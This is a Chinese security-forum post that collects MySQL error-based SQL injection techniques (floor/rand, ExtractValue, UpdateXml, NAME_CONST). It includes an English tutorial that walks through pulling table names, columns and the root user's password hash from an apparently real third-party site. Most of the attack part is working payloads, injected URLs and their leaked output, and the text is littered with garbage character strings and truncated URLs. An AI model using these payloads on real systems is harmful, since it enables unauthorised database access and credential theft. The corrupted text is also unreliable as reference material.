找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3147|回复: 0
打印 上一主题 下一主题

mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2015-11-11 19:03:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:- y! r( q; `' o+ e2 f0 q
首先进行正常查询:

mysql> select * from article where id = 1;
3 d7 L9 z/ [$ U+—-+——-+———+) Q) C( t. i( v+ o# e+ v6 L
| id | title | content |4 D* x* D. j4 @: Y; F# i
+—-+——-+———+
! J( \: v. g/ ]6 A! W|  1 | test  | do it   |
( U0 ~; r  ^+ U+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
; [3 _9 I2 v. p$ u, JERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
9 w, g6 d6 V2 ?) l9 D) T例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);) |0 U, H) F% z; O' L" J
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
# k. @$ F# }; l6 u+ g! oERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
6 p1 C( A5 L- a$ f测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–& O; ^7 M0 U' W5 v
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’


( K2 x4 ~0 V) b' M. Z, U% {+ x7 y" o1 Q

再收集:


! D, o7 i7 ]3 S! F% V% shttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) ' S* Y1 \7 E2 w

3 k, [* G% t$ d% s1 pErroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’8 g4 ^  O& N6 i% q- F% X1 G7 U

  G* n/ M4 e3 {http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
5 r7 a+ ^) ]9 X2 ^4 _( P
; u% ]  j: N8 X& i+ s4 P& U4 O* zErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
5 C+ \& l9 x9 ^" ]: L, D5 o
9 S# G2 L  a; m- p5 U" \' bMYSQL高版本报错注入技巧-利用NAME_CONST注入
4 r  h5 _+ |& g! [It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
- K) F% x; E2 ?5 N+ ]% z
* S: X5 G# \& L+ F% G0 G1 q( I0 ]
相关信息
$ a6 ~( m) `/ `7 ~( e5 i
6 e& @+ q. ^* e) F/ a' k- @3 Z1 P) aNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
" j7 u7 ^* i. U" \
4 W: r$ j5 I3 M6 B, m& @. d4 f* bCode:
$ W: ~' l8 \4 a- T) m% o* k6 XNAME_CONST(DATA, VALUE)! e& Q& S1 f! M$ K, F8 E
" ]  z) I& _* Z; `5 h9 l4 {
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.$ k: B" L0 p" B& L" ^

, y* H$ _' t: A% z; S4 ]SELECT NAME_CONST('TEST', 1)
0 F; P. c  a' Q! }3 |- c# J$ h( [( O) w& ?( h
: \0 x' _8 F- ]. g9 N* P8 |

* t, _" c, j& [% x7 |- ~8 B|---------------|* j' T: w. T, a( B+ Y' f
|     TEST      |
7 \1 f9 i8 x7 z, I' O0 Y|               |
' n8 K- s2 _$ `$ L! \|---------------|5 d) P8 U* w1 p) \( O
|       1       |6 S0 B2 O: k$ L1 v2 \
|               |
# n" m! p; ^+ k0 S/ A! v6 R|---------------|) h. v5 K5 V6 h" b" s
2 c. H7 l) r7 ]$ A. ^
4 T  R2 U; e! e6 M  ^5 ~( r) v

; s  m8 |* h  U( `( n2 @: k
, g! b- R6 z" hhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const% E9 k  B4 @- x0 A' g
Intro to MySQL Variables
2 s9 D. D+ I) u7 A1 O2 O4 q$ k
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.! j' K+ T3 j* o3 Q* _! d
5 Q( y1 d( g# x; K: c, }! z0 W. s) ?
Code:+ c; D* X- \+ m9 r( r
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261! F: V9 t$ ?3 g! r/ g8 ]+ y8 E) P

/ Q1 u- e, P) f8 c1 }, L' A
1 n; K4 J" J6 O& {# P* i& O

7 X( r9 c  \! V. O2 G* z- t9 i! r: z$ x

2 c( b( s" q2 V# j& V( K+ h
% b+ }+ Y1 n4 t, Z  c4 B  [Code:2 i/ M; Q; T( e' t  n6 [: F1 @
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--3 x- f, u% m9 K$ ^- }

$ c1 N' s0 G! e8 p7 _' Y) Y  q( ^& N' o
VAR = Your MySQL variable.
. F0 o' ^1 l% f, c- v. c. R
6 _0 y$ f; D* g$ k/ x4 P, D6 jMySQL 5.1.3 Server System Variables
# d) ~# }( j! U
: d0 p- I) e4 h1 x. K) ^Let's try it out on my site..) O, |/ o& g. H, H) c; `8 K
- |/ b; n: i* ~* H
Code:; i" b. {+ q2 a0 E2 w; w8 M5 L' T
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--( o, s- \! \. u) G

6 W( \7 f+ Y" o+ oErroruplicate column name '5.0.27-community-nt'
4 g" V5 b& b8 J' m3 k0 R: I

6 h4 X# v# E  [0 U& D3 \; S% I! U$ b7 p; y
9 \% M+ {. x5 U& `2 t1 S0 H
. o3 z( G% P$ S, N; L7 H+ @

: E5 {- C- T" v% w) iNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
  e& j. Z: m  ~6 [1 H9 t2 K4 _% N6 f  [: q' ?
Data Extraction1 t- a1 |! a  L0 V0 ]4 M
: `3 a. w5 A9 x; o% o% w
Code:8 N& R/ y' M- }0 v4 m) w; L1 D
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--, E2 T! l6 N+ J' T+ d
+ U- P3 N* O, E" n) z

- I: ?) z2 ?) \" Y2 o. I% \We should get a duplicate column 1 error...$ n& J1 J: d& w5 M! n* H

" ^3 G# ]0 Z" L) O5 U+ z3 zCode:; e5 s! r1 ~' o3 _! O+ `
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--: [+ A) f0 X. @8 _6 {
2 C8 |1 c7 y5 Q" e& u8 ^8 E+ V
Erroruplicate column name '18 Z$ J7 g5 I( f5 d- Q
; s( y+ C" L2 w; ]/ u0 N' W4 [; z  V

6 ]8 k; Q8 @7 h; s5 ~& M. C2 i& e6 |! z: E8 \/ [* h
7 @9 A2 k2 ]; ^
$ T7 f: e( x: A, U9 s
, L# `$ u: {5 ]$ i1 V" J
Now let's get the tables out this bitch..
6 I' h. g, B+ N7 ~1 U- ^2 D0 i5 A3 I5 U1 R! w
Code:- D4 |9 y: @' R  j' i, B" R
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--* k- p! P$ N4 J4 u  e3 w
+ R  s2 S  Q9 P$ r# X% V. g9 n7 J; w
: [) X% ]# w0 Z1 |4 I2 N/ s
Let's see if it works here, if it does, we can go on and finish the job.4 E: k* t: x) u! h0 |
( L6 ?6 E* C) z! I! X, z: K
Code:, v2 m# G) x: q1 x. L5 U
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--% l" [& q6 M! l$ S) H

# ^, P, D6 E  v7 q
5 ?' H* x1 ^' k4 J8 tErroruplicate column name 'com_admanage
% i% ]! J( C2 D% n  Q- t

( v4 w8 I/ V+ G0 O$ `* [; r7 [
% @$ l/ l  F& ~! c
- O/ Y3 O. r" ~1 Y% X( ]
9 l3 C+ n. K& U3 d4 _" c. c" ~( N

; O' X; P* D! n. O( {9 ~' z+ V( A
+ ~2 P# |  {4 k8 g$ y0 z  q. HNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
! e& y$ Y6 l4 {8 J8 |  {
' d3 W. [1 }) K& s. PLet's get the columns out of the user table..
  Z9 ~* U% c1 ]" `# L2 u/ ?8 _9 o* E5 {4 n' P9 }
Code:
/ V# |& d7 U& _8 m0 ^5 |+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--8 r& p- X- N$ L& U' C! R4 d
5 |0 C% l. \' t( ^

: G; W# W$ o3 |- ^0 ISo mine looks like this, and I get the duplicate column name 'Host'.8 e8 O5 z+ a$ o4 N% Z. Q* Q
4 C( ~. f: o6 D, z& B, Z! \
Code:
3 n7 C6 @; e/ m# z, G( q6 `, fhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--4 U9 D- n8 s* J$ Q

6 O3 t0 N  a$ FErroruplicate column name 'Host'
, t- A' x: M& R' |- b$ O. u* c2 I# l

/ z. x# @7 w! I/ r; K( K+ B5 B6 S
; n: m# a  J! [% v) T
+ G7 I& I; ]2 k( q) d$ f$ [7 q* L0 ]* n4 v

- P/ f  r- c' U5 k0 c3 c7 C( \' }, G" t+ x  y* l' q$ ]
Woot, time to finish this bitch off.
* C9 H; [2 N8 _
, \% D/ s4 g( q( Q( i7 ECode:
& w" I. ?6 H. B& p- Q  @+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--% _  U. x, c& \% D% u
+ ~- i! {; R/ L, ~" V4 @: P* K
% z# m; |8 D9 R. A+ W5 i  C
So mine looks like this...1 o  p8 f- G! g: b# m0 r
8 N5 ?8 d( F. q0 g" j  Z1 [$ w! O
Code:
& f$ T4 R, {$ ~/ G3 T( F5 Mhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
0 X" J+ {- i2 N7 ~6 J9 q
8 i% c0 U# a* K0 T. DErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
9 f; |  {, U; V
# _) `4 y  [1 o. c& H( f8 R
3 I7 z7 B. v& G' N6 T: f/ |

& e! Q) b0 e, r+ G0 t6 c0 \. j/ j1 P
" `8 C, D/ T+ h

0 x. C: K& ~' f: G2 B  [7 l2 q
8 }: v: f1 L, A4 X2 D4 x1 tAnd there we have it, thanks for reading.
3 S, W# c5 U. n, P9 G

, A& p; R8 I# X% E. ?9 d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表